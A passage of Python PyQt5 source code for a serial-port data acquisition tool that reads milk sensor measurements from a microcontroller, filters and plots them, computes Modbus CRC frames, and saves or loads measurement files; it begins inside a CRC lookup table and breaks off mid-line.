0x0440,\r\n\t\t0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,\r\n\t\t0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,\r\n\t\t0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,\r\n\t\t0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,\r\n\t\t0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,\r\n\t\t0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,\r\n\t\t0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,\r\n\t\t0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,\r\n\t\t0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,\r\n\t\t0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,\r\n\t\t0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,\r\n\t\t0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,\r\n\t\t0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,\r\n\t\t0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,\r\n\t\t0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,\r\n\t\t0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,\r\n\t\t0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,\r\n\t\t0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,\r\n\t\t0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,\r\n\t\t0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,\r\n\t\t0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,\r\n\t\t0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,\r\n\t\t0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,\r\n\t\t0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,\r\n\t\t0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,\r\n\t\t0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,\r\n\t\t0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,\r\n\t\t0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,\r\n\t\t0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,\r\n\t\t0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040 )\r\n\r\n\t\tself.ComPort = str\r\n\t\tself.comport_combo = QtWidgets.QComboBox()\r\n\t\tself.comport_combo.addItems([\"\"])\r\n\t\tself.comport_combo.addItems([\"Refresh\"])\r\n\t\tself.comport_combo.activated[str].connect(self.on_activated_com_list)\r\n\t\tself.comport_combo.activated[str].connect(self.ComPort)\r\n\r\n\t\tvertical_size = 30\r\n\t\thorizontal_size = 80\r\n\t\t\r\n\t\tself.onlyInt = QtGui.QIntValidator(1,5000)\r\n\t\t\r\n\t\tself.btn_cord_fixed = QtWidgets.QPushButton(\"&Capture\")\r\n\t\tself.btn_cord_fixed.setMaximumSize(120,60)\r\n\t\tself.btn_cord_fixed.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\r\n\t\tself.btn_load_file = QtWidgets.QPushButton(\"&Load File\")\r\n\t\tself.btn_load_file.setMaximumSize(80,60)\r\n\t\tself.btn_load_file.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\r\n\r\n\t\tself.label_visa_connect = QtWidgets.QLabel(\"COM port:\")\r\n\t\tself.label_visa_connect.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.label_visa_connect.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\t\tself.btn_visa_connect = QtWidgets.QPushButton(\"Connect\")\r\n\t\tself.btn_visa_connect.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_visa_connect.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\t\tself.btn_visa_disconnect = QtWidgets.QPushButton(\"Disconnect\")\r\n\t\tself.btn_visa_disconnect.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_visa_disconnect.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\r\n\t\tself.btn_visa_disconnect.setDisabled(True)\r\n\t\t\t\r\n\t\tself.data_fetch_timeout = QtWidgets.QLineEdit(\"001\")\r\n\t\tself.data_fetch_timeout.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.data_fetch_timeout.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\t\tself.data_fetch_timeout.setValidator(self.onlyInt)\r\n\t\tself.data_fetch_timeout.setAlignment(QtCore.Qt.AlignCenter)\r\n\r\n\t\tself.log_widget = QtWidgets.QPlainTextEdit()\r\n\t\tself.log_widget.insertPlainText(\"Log: \")\r\n\t\tself.log_widget.setReadOnly(True)\t\r\n\r\n\t\tself.description_widget = QtWidgets.QPlainTextEdit()\r\n\t\tself.description_widget.insertPlainText(\"File description: \")\r\n\t\tself.description_widget.setReadOnly(False)\t\t\t\t\r\n\r\n\t\tself.timeout_label = QtWidgets.QLabel(\"Timeout(ms):\")\r\n\t\tself.timeout_label.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.timeout_label.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\r\n\r\n\t\tself.btn_clear = QtWidgets.QPushButton(\"&Clear\")\r\n\t\tself.btn_clear.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_clear.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\r\n\t\tself.btn_fetch = QtWidgets.QPushButton(\"&Fetch\")\r\n\t\tself.btn_fetch.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_fetch.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\r\n\r\n\t\tself.btn_save = QtWidgets.QPushButton(\"&Save\")\r\n\t\tself.btn_save.setMaximumSize(horizontal_size,vertical_size)\r\n\t\tself.btn_save.setSizePolicy(QtWidgets.QSizePolicy.Fixed,QtWidgets.QSizePolicy.Fixed)\t\t\r\n\t\t\r\n\t\tself.grid = QtWidgets.QGridLayout()\r\n\t\tself.grid_2 = QtWidgets.QGridLayout()\r\n\t\tself.grid_plot_labels = QtWidgets.QGridLayout()\r\n\r\n\t\tself.grid.addWidget(self.label_visa_connect, 0, 0)\r\n\t\tself.grid.addWidget(self.comport_combo, 0, 1)\r\n\t\tself.grid.addWidget(self.btn_visa_connect, 0, 2)\r\n\t\tself.grid.addWidget(self.btn_visa_disconnect, 0, 3)\r\n\t\t\r\n\t\tself.grid.addWidget(self.timeout_label, 1, 3)\r\n\t\tself.grid.addWidget(self.btn_clear, 1, 2)\r\n\t\tself.grid.addWidget(self.btn_fetch,2,0)\r\n\t\t#self.grid.addWidget(self.btn_stop,2,1)\r\n\t\tself.grid.addWidget(self.btn_save,2,1)\r\n\t\tself.grid.addWidget(self.btn_load_file, 2,2)\r\n\t\tself.grid.addWidget(self.data_fetch_timeout, 2,3)\r\n\r\n\t\tself.grid.addWidget(self.description_widget, 3,0,4,5)\r\n\t\tself.grid.addWidget(self.log_widget, 8, 0, 7, 5)\r\n\r\n\t\tself.grid_plot_labels.addWidget(self.btn_cord_fixed, 0,0)\r\n\t\tself.grid_plot_labels.addWidget(QtWidgets.QLabel(\"\"),0,3)\r\n\t\tself.grid_plot_labels.addWidget(QtWidgets.QLabel(\"\"),0,5)\r\n\t\t#self.grid_plot_labels.insertStretch(0,4)\r\n\t\t\t\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,0)\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,1)\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,2)\r\n\t\tself.grid.addWidget(QtWidgets.QLabel(\"\"),15,3)\r\n\t\t\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,0)\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,1)\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,2)\r\n\t\tself.grid_2.addWidget(QtWidgets.QLabel(\"\"),13,3)\r\n\t\t\t\t\r\n\t\tself.vbox_1 = QtWidgets.QVBoxLayout()\r\n\t\tself.vbox_1.insertLayout(0,self.grid)\r\n\t\tself.vbox_1.insertLayout(1,self.grid_2)\r\n\t\t#self.vbox_1.insertLayout(2,self.grid_3)#table grid\r\n\t\t#self.vbox_1.addWidget(self.agm_readblock)\r\n\t\tself.vbox_1.insertStretch(3,0)\r\n\t\t#self.vbox_1.insertLayout(1,self.form)\r\n\t\t#self.setLayout(self.grid)\r\n\t\t\r\n\t\tself.hbox = QtWidgets.QHBoxLayout()\r\n\t\tself.vbox_graph_table = QtWidgets.QVBoxLayout()\r\n\r\n\t\t#self.vbox_graph_table.insertLayout(0,self.grid_plot_labels)\r\n\t\tself.vbox_graph_table.addWidget(self.graph)\r\n\t\tself.vbox_graph_table.addWidget(self.graph_pressure)\r\n\t\tself.vbox_graph_table.insertStretch(2,0)\r\n\t\t#self.hbox.addWidget(self.m)\r\n\t\tself.hbox.insertLayout(0,self.vbox_1)\r\n\t\tself.hbox.insertLayout(1,self.vbox_graph_table)\r\n\t\r\n\t\tself.hbox_2 = QtWidgets.QHBoxLayout()\r\n\r\n\t\tself.hbox_2.insertSpacing(0,335)\r\n\t\tself.hbox_2.insertStretch(2,0)\r\n\t\t#self.hbox_upper.addSpacing(200)\r\n\t\t\r\n\t\tself.vbox = QtWidgets.QVBoxLayout()\r\n\t\t#self.vbox.addWidget(self.label)\t\t\r\n\t\t#self.vbox.insertLayout(0,self.hbox1)\r\n\t\tself.vbox.insertLayout(0,self.hbox)\r\n\t\tself.vbox.insertLayout(1,self.hbox_2)\r\n\t\t#self.vbox.insertLayout(2,self.grid_3)\r\n\t\t#self.vbox.addWidget(self.table_of_records,1)\r\n\t\tself.setLayout(self.vbox)\r\n\r\n\t\tself.btn_fetch.setDisabled(True)\r\n\t\tself.btn_save.setDisabled(True)\r\n\r\n\t\tself.meas_thread = evThread()\r\n\t\t#self.meas_thread.start()\r\n\r\n\t\t#self.btn_visa_connect.clicked.connect(self.on_get_current_path)\r\n\t\t#self.btn_visa_connect.clicked.connect(self.meas_thread.on_connected)\r\n\t\tself.btn_visa_connect.clicked.connect(self.on_connected)\r\n\t\tself.btn_visa_disconnect.clicked.connect(self.on_disconnected)\r\n\t\tself.btn_save.clicked.connect(self.on_save_to_file)\r\n\t\tself.btn_load_file.clicked.connect(self.on_load_from_file) \r\n\t\tself.btn_fetch.clicked.connect(self.on_fetch_data)\r\n\t\tself.btn_clear.clicked.connect(self.on_clear_data)\r\n\t\t#self.comport_combo.activated.connect(self.meas_thread.on_activated_com_list)\r\n\r\n\t\t#self.meas_thread.started.connect(self.on_meas_started)\r\n\t\t#self.meas_thread.finished.connect(self.on_meas_completed)\r\n\t\t#self.meas_thread.status_signal.connect(self.on_status_text_change, QtCore.Qt.QueuedConnection)\r\n\t\t#self.meas_thread.dataplot.connect(self.data_from_f4, QtCore.Qt.QueuedConnection)\r\n\t\tself.meas_thread.dataplot.connect(self.on_data_received, QtCore.Qt.QueuedConnection)\r\n\t\tself.meas_thread.dataplot_array.connect(self.on_data_array_received, QtCore.Qt.QueuedConnection)\r\n\t\t#self.meas_thread.progress.connect(self.on_progress_go,QtCore.Qt.QueuedConnection)\r\n\t\t#self.proxy = pg.SignalProxy(self.graph.scene().sigMouseMoved, rateLimit=60, slot=self.mouseMoved)\r\n\t\t#self.curve.sigClicked.connect(self.clicked_point)\r\n\t\t#self.curve.sigPointsClicked.connect(self.clicked_point)\r\n\r\n\tdef on_clear_data(self):\r\n\t\tself.data_to_storage = list()\r\n\t\tself.y_axio = list()\r\n\t\tself.graph_pressure.clear()\r\n\t\tself.graph.clear()\r\n\t\tself.description_widget.clear()\r\n\t\tself.log_widget.clear()\r\n\r\n\r\n\tdef filter(self, data_input):\r\n\t\tdata_result = list()\r\n\t\tfor i in range(len(data_input)):\r\n\t\t\tself.filter_data_out = self.filter_data_out*self.filter_k + (1-self.filter_k)*data_input[i]\r\n\t\t\tdata_result.append(self.filter_data_out)\r\n\t\treturn data_result\r\n\r\n\tdef on_data_array_received(self, data_array):\r\n\t\tself.graph.clear()\r\n\t\ttemp_data = self.filter(data_array)\r\n\t\tself.y_axio += temp_data\r\n\t\tself.data_to_storage += temp_data\r\n\r\n\t\tif(len(self.y_axio)>2000):\r\n\t\t\tlength = len(self.y_axio)\r\n\t\t\tfp = length - 2000\r\n\t\t\tself.y_axio = self.y_axio[fp:length]\r\n\t\tx_axio = np.linspace(0,len(self.y_axio)-1, len(self.y_axio))\r\n\r\n\t\tdata_np = np.asarray(self.y_axio)\r\n\t\tmean_value = np.mean(data_np)\r\n\t\tself.curve1 = self.graph.plot(x_axio,self.y_axio, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.log_widget.appendPlainText(\"[{}] new data from mcu, total length {} mean {:4.2f}\".format(strftime(\"%H:%M:%S\"), len(self.data_to_storage), mean_value))\t\r\n\r\n\tdef on_data_received(self,data):\r\n\t\tself.graph.clear()\r\n\t\tself.y_axio.append(data)\r\n\t\tif(len(self.y_axio)>200):\r\n\t\t\tlength = len(self.y_axio)\r\n\t\t\tfp = length - 200\r\n\t\t\tself.y_axio = self.y_axio[fp:length]\r\n\t\tx_axio = np.linspace(0,len(self.y_axio)-1, len(self.y_axio))\r\n\t\tself.curve1 = self.graph.plot(x_axio,self.y_axio, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\tself.log_widget.appendPlainText(\"[{}] new data from mcu\".format(strftime(\"%H:%M:%S\")))\r\n\r\n\tdef on_connected(self):\r\n\t\ttry:\r\n\t\t\t#self.ser = serial.Serial(self.ComPort, baudrate=921600, bytesize=serial.EIGHTBITS,\r\n\t\t\t#\t\t\t\t\t\t parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout = 0.1)\r\n\t\t\t#self.ser.isOpen() # try to open port\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\t\tself.btn_visa_disconnect.setDisabled(False)\r\n\t\t\tself.btn_fetch.setDisabled(False)\r\n\t\t\tself.btn_save.setDisabled(False)\r\n\t\t\tself.serialDeviceConnected = True\r\n\t\t\tself.comport_combo.setEnabled(False)\r\n\t\t\tself.meas_thread.on_connected(self.ComPort)\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] Connected to {}\".format(strftime(\"%H:%M:%S\"), self.ComPort))\r\n\t\texcept IOError:\r\n\t\t\t#print(\"Port already open another programm\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] Port {} already open another programm\".format(strftime(\"%H:%M:%S\"), self.ComPort))\r\n\t\texcept serial.SerialException:\r\n\t\t\t#print(\"SerialException\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] SerialException\".format(strftime(\"%H:%M:%S\")))\r\n\t\texcept Exception:\r\n\t\t\t#print(\"Unexpected error, Null ComName\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] unexpected error\".format(strftime(\"%H:%M:%S\")))\r\n\tdef on_disconnected(self):\r\n\t\tself.btn_visa_connect.setDisabled(False)\r\n\t\tself.btn_visa_disconnect.setDisabled(True)\t\r\n\t\tself.btn_fetch.setDisabled(True)\r\n\t\tself.btn_save.setDisabled(True)\r\n\t\tself.serialDeviceConnected = False\r\n\t\tself.comport_combo.setEnabled(True)\r\n\t\tself.log_widget.appendPlainText(\"[{}] Disconnected\".format(strftime(\"%H:%M:%S\")))\r\n\t\ttry:\t\r\n\t\t\t#self.ser.close()\r\n\t\t\tself.meas_thread.on_disconnected()\r\n\t\t\tpass\r\n\t\texcept:\r\n\t\t\t#print(\"serial port close exception, on_disconnect --traceback\")\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] error, device session lost\".format(strftime(\"%H:%M:%S\")))\r\n\t\tprint(\"Disconnected\")\r\n\t\t\t\r\n\tdef on_activated_com_list(self, str):\r\n\t\tif self.comport_combo.currentText() == \"\" or self.serialDeviceConnected == True:\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\telif self.comport_combo.currentText() == \"Refresh\":\r\n\t\t\tself.btn_visa_connect.setDisabled(True)\r\n\t\t\tself.comport_combo.clear()\r\n\t\t\tself.comport_combo.addItems([\"\"])\r\n\t\t\tself.comport_combo.addItems([\"Refresh\"])\r\n\t\t\tself.comport_combo.addItems(serial_ports())\r\n\t\telse:\r\n\t\t\tself.ComPort = str\r\n\t\t\tself.btn_visa_connect.setDisabled(False)\r\n\r\n\tdef on_fetch_data(self):\r\n\t\tif self.fetch_enable == True:\r\n\t\t\tself.fetch_enable = False\r\n\t\t\tself.meas_thread.running = False\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] fetch stop\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\tself.graph_pressure.clear()\r\n\t\t\tx_axio = np.linspace(0,len(self.data_to_storage)-1, len(self.data_to_storage))\r\n\t\t\tself.curve1 = self.graph_pressure.plot(x_axio,self.data_to_storage, pen = pg.mkPen('w', width = 3), symbol = 'o', symbolSize = 6)\r\n\t\telse:\r\n\t\t\tself.fetch_enable = True\r\n\t\t\tself.meas_thread.running = True\r\n\t\t\tself.meas_thread.start()\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] fetch start\".format(strftime(\"%H:%M:%S\")))\r\n\r\n\tdef on_send_to_timer(self):\r\n\t\tt_data_array = [0]*9\r\n\t\tt_data_array[0] = self.slave_address\r\n\t\tt_data_array[1] = self.slave_register\r\n\t\tt_data_array[2] = 0x06\r\n\t\tt_data_array[3] = 0x7F\r\n\t\tt_data_array[4] = 0x00\r\n\t\tt_data_array[5] = 0x01\r\n\t\tt_data_array[6] = 0x02\r\n\t\tt_data_array[7] = 0x00\r\n\t\tt_data_array[8] = 0x0a\r\n\r\n\t\tt_bytearray = array.array('B', t_data_array).tobytes()\r\n\t\tprint(t_bytearray)\r\n\t\t#temp_crc_full = self.calcString( \"\\x05\\x10\\x10\\x00\\x00\\x01\\x02\\x00\\x0a\", self.INITIAL_MODBUS)\r\n\t\ttemp_crc_full = self.calcString( (t_bytearray), self.INITIAL_MODBUS)\r\n\t\tu16_crc16 = int(temp_crc_full)\r\n\t\tprint(temp_crc_full)\r\n\t\t#u16_crc_reverse = ((u16_crc16<<8)&0xff00) | ((u16_crc16>>8)&0xff)\r\n\t\tself.slave_crc16_lo = ((u16_crc16)&0xff)\r\n\t\tself.slave_crc16_hi = ((u16_crc16>>8)&0xff)\r\n\t\tprint(\"lo - {:02X} hi - {:02X}\".format(self.slave_crc16_lo, self.slave_crc16_hi))\r\n\t\tprint(\"lo - {} hi - {}\".format(self.slave_crc16_lo, self.slave_crc16_hi))\r\n\t\tself.data_array[0] = t_data_array[0]\r\n\t\tself.data_array[1] = t_data_array[1]\r\n\t\tself.data_array[2] = t_data_array[2]\r\n\t\tself.data_array[3] = t_data_array[3]\r\n\t\tself.data_array[4] = t_data_array[4]\r\n\t\tself.data_array[5] = t_data_array[5]\r\n\t\tself.data_array[6] = t_data_array[6]\r\n\t\tself.data_array[7] = t_data_array[7]\r\n\t\tself.data_array[8] = t_data_array[8]\r\n\t\tself.data_array[9] = self.slave_crc16_lo\r\n\t\tself.data_array[10] = self.slave_crc16_hi\r\n\t\tself.data_bytearray = bytearray(self.data_array)\r\n\t\tprint(self.data_bytearray)\r\n\t\tself.ser.write(self.data_bytearray)\t\r\n\r\n\tdef on_get_current_path(self):\r\n\t\treturn(os.path.dirname(os.path.abspath(__file__)))\t\r\n\tdef on_save_to_file(self):\r\n\t\t#self.data_to_file(strftime(\"%Y-%m-%d_%Hh%Mm%Ss\", gmtime()))\t\r\n\t\tself.data_to_file_microphone(strftime(\"%Y-%m-%d_%Hh%Mm%Ss\", gmtime()))\r\n\tdef data_to_file(self, name = \"milk_data\"):\r\n\t\tself.file_description = self.description_widget.toPlainText()\r\n\t\tself.file_x_ax = self.x_ax\r\n\t\tself.file_data_ch1 = self.trace1\r\n\t\tself.file_data_ch2 = self.trace2\r\n\t\tself.file_data_pressure = self.trace3\r\n\t\tdict_to_save = {'description':self.file_description, 'CH1':self.file_data_ch1,'CH2':self.file_data_ch2, 'Pressure':self.file_data_pressure, 'Time': self.file_x_ax}\r\n\t\tdict_filename = \"{}\\\\milk_{}.npy\".format(os.path.dirname(os.path.abspath(__file__)),name)\r\n\t\tfilename = \"{}\\\\milk_{}.dat\".format(os.path.dirname(os.path.abspath(__file__)),name)\r\n\t\ttry:\r\n\t\t\tnp.save(dict_filename, dict_to_save)\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful save\".format(strftime(\"%H:%M:%S\")))\r\n\t\texcept Exception:\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), traceback.format_exc()))\t\r\n\tdef data_to_file_microphone(self, name = \"milk_data\"):\r\n\t\tself.file_description = self.description_widget.toPlainText()\r\n\t\tself.file_data_ch1 = self.data_to_storage\t\t\r\n\t\tdict_to_save = {'description':self.file_description, 'DATA':self.file_data_ch1}\r\n\t\tdict_filename = \"{}\\\\milk_microphone_{}.npy\".format(os.path.dirname(os.path.abspath(__file__)),name)\r\n\t\ttry:\r\n\t\t\tnp.save(dict_filename, dict_to_save)\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful save\".format(strftime(\"%H:%M:%S\")))\r\n\t\texcept Exception:\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), traceback.format_exc()))\t\t\t\t\r\n\tdef on_load_from_file(self):\r\n\t\tfname = QFileDialog.getOpenFileName(self, 'Open file', '{}/'.format(self.on_get_current_path()))[0]#/home\r\n\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), fname))\t\r\n\t\tif fname:\r\n\t\t\ttry:\r\n\t\t\t\tfilename, file_extension = os.path.splitext(fname)\r\n\t\t\t\tif file_extension == \".BIN\" or file_extension == \".bin\":\r\n\t\t\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful load\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\t\t\tself.graph.clear()\r\n\t\t\t\t\tself.graph_pressure.clear()\r\n\t\t\t\t\tdata_raw = np.fromfile(fname, dtype = np.uint8)\r\n\t\t\t\t\tdata_u16 = list()\r\n\r\n\t\t\t\t\tfor i in range(int(len(data_raw)/2)):\r\n\t\t\t\t\t\tdata_u16.append((data_raw[2*i+1]<<8)+(data_raw[2*i]))\r\n\t\t\t\t\tself.trace1 = np.empty(int(len(data_u16)/2))\r\n\t\t\t\t\tself.trace2 = np.empty(int(len(data_u16)/2))\r\n\t\t\t\t\tfor i in range(int(len(data_u16)/2)):\r\n\t\t\t\t\t\tself.trace1[i] = (data_u16[2*i])\r\n\t\t\t\t\t\tself.trace2[i] = (data_u16[2*i+1])\r\n\t\t\t\t\tself.x_ax = np.linspace(0,1,int(len(data_u16)/2))\r\n\t\t\t\t\tself.curve1 = self.graph.plot(self.x_ax,self.trace1, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\tself.curve2 = self.graph.plot(self.x_ax,self.trace2, pen = pg.mkPen('y', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\telse:\r\n\t\t\t\t\t#self.log_widget.appendPlainText(\"[{}] wrong file type\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\t\t\tdata_dict = np.load(fname, allow_pickle=True)\r\n\t\t\t\t\tself.file_description = \"\"\r\n\t\t\t\t\tself.file_data_ch1 = np.empty(0)\r\n\t\t\t\t\tself.file_data_ch2 = np.empty(0)\r\n\t\t\t\t\tself.file_data_pressure = np.empty(0)\r\n\t\t\t\t\tself.file_data_microphone = np.empty(0)\r\n\t\t\t\t\tdata_items = data_dict.item()\r\n\r\n\t\t\t\t\tfile_type = 'MILK_PHOTODIODE'\r\n\t\t\t\t\tfor key in data_items.keys():\r\n\t\t\t\t\t\tif key == 'DATA':\r\n\t\t\t\t\t\t\tfile_type = 'MILK_MICROPHONE'\r\n\t\t\t\t\tif file_type == 'MILK_MICROPHONE':\r\n\t\t\t\t\t\tself.graph_pressure.clear()\r\n\t\t\t\t\t\tself.file_data_microphone = data_items['DATA']\r\n\t\t\t\t\t\tself.file_description = data_items['description']\r\n\t\t\t\t\t\tself.description_widget.clear()\r\n\t\t\t\t\t\tself.description_widget.appendPlainText(self.file_description)\t\t\t\t\t\t\r\n\t\t\t\t\t\tx_axio = np.linspace(0,len(self.file_data_microphone)-1, len(self.file_data_microphone))\r\n\t\t\t\t\t\tself.curve = self.graph_pressure.plot(x_axio,self.file_data_microphone, pen = pg.mkPen('w', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful load[microphone]\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.graph.clear()\r\n\t\t\t\t\t\tself.graph_pressure.clear()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tself.file_description = data_items['description']\r\n\t\t\t\t\t\tself.file_data_ch1 = data_items['CH1']\r\n\t\t\t\t\t\tself.file_data_ch2 = data_items['CH2']\r\n\t\t\t\t\t\tself.file_data_pressure = data_items['Pressure']\t\r\n\t\t\t\t\t\tself.file_x_ax = data_items['Time']\r\n\t\t\t\t\t\tself.data_download_done = 1\r\n\r\n\t\t\t\t\t\tself.description_widget.clear()\r\n\t\t\t\t\t\tself.description_widget.appendPlainText(self.file_description)\r\n\r\n\t\t\t\t\t\tself.trace1 = self.file_data_ch1\r\n\t\t\t\t\t\tself.trace2 = self.file_data_ch2\r\n\t\t\t\t\t\tself.trace3 = self.file_data_pressure\r\n\t\t\t\t\t\tself.x_ax = self.file_x_ax\r\n\r\n\t\t\t\t\t\tself.curve1 = self.graph.plot(self.x_ax,self.trace1, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\t\tself.curve2 = self.graph.plot(self.x_ax,self.trace2, pen = pg.mkPen('y', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\t\tself.curve3 = self.graph_pressure.plot(self.x_ax,self.trace3, pen = pg.mkPen('r', width = 3), symbol = 'o', symbolSize = 4)\r\n\r\n\t\t\t\t\t\tself.btn_save.setDisabled(False)\r\n\t\t\t\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful load[photodiodes]\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\texcept:\r\n\t\t\t\tself.log_widget.appendPlainText(\"[{}] file load failed\".format(strftime(\"%H:%M:%S\")))\t\r\n\t\t\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), traceback.format_exc()))\t\t\t\t\t\t\r\n\tdef on_interrupted(self):\r\n\t\tself.meas_thread.running = False\r\n\t\t\r\n\tdef on_display_record(self):\r\n\t\tself.graph.clear()\r\n\t\tself.record_number = self.current_row + 1\r\n\t\tself.cursor_trigger = 0\r\n\t\tself.xpos = 0\r\n\t\tself.ypos = 0\r\n\t\t#self.label_cord.setText(\"X pos: {:03d} Y pos: {:04d} Time: {:0.2f}sec\".format(self.xpos, self.ypos, self.xpos*self.record_sampling_time))\r\n\t\t#self.graph.enableAutoRange(ViewBox.YAxis, enable=False)\r\n\t\t#self.graph.enableAutoRange(ViewBox.XAxis, enable=True)\r\n\t\tself.graph.showGrid(1,1,1)\r\n\t\tself.graph.addItem(self.vLine, ignoreBounds=True)\r\n\t\tself.graph.addItem(self.hLine, ignoreBounds=True)\t\r\n\t\tself.plot_xaxis = list()\r\n\t\tfor i in range(len(self.parsed_data_list[self.current_row])):\r\n\t\t\tself.plot_xaxis.append(i*self.record_sampling_time)\r\n\r\n\t\tself.curve = self.graph.plot(self.plot_xaxis,self.parsed_data_list[self.current_row], pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 10, title = \"Record 